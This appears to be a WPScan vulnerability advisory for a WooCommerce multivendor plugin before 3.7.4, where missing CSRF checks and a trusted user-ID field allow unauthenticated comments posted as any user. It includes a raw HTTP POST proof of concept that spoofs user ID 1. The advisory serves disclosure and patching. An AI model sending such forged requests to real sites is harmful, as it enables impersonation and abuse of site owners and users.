Multivendor Marketplace Solution for WooCommerce < 3.7.4 – Unauthenticated Arbitrary Product Comment | Plugin Vulnerabilities

Description

The plugin did not properly check for CSRF when saving a product comment, and took the user ID to link the comment to from user input. As a result, attackers can post arbitrary comment, as another user as well by manipulating the current_user_id parameter.

Proof of Concept

POST / HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 111
Connection: close

wcmp_submit_product_comment=1&product_comment_text=Fake+Comment+from+User+ID+1&product_id=890&current_user_id=1

Affects Plugins

dc-woocommerce-multi-vendor

Fixed in 3.7.4

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

3d06075a-c106-48bb-849e-39b71f4c6818

Timeline

Publicly Published

2021-05-26 (about 4 years ago)

Added

2021-05-26 (about 4 years ago)

Last Updated

2021-05-26 (about 4 years ago)

Other

Published

Title

Published

2021-09-06

Title

WordPress Automatic < 3.53.3 - Unauthenticated Arbitrary Options Update

Published

2021-11-03

Title

Event Manager for WooCommerce < 3.5.3 - Unauthenticated Arbitrary Elementor Template Import

Published

2024-11-04

Title

Zotpress < 7.3.13 - Missing Authorization

Published

2024-05-21

Title

UserPro < 5.1.9 - Unauthenticated Account Takeover to Privilege Escalation

Published

2021-01-28

Title

uListing < 1.7 - Missing Access Controls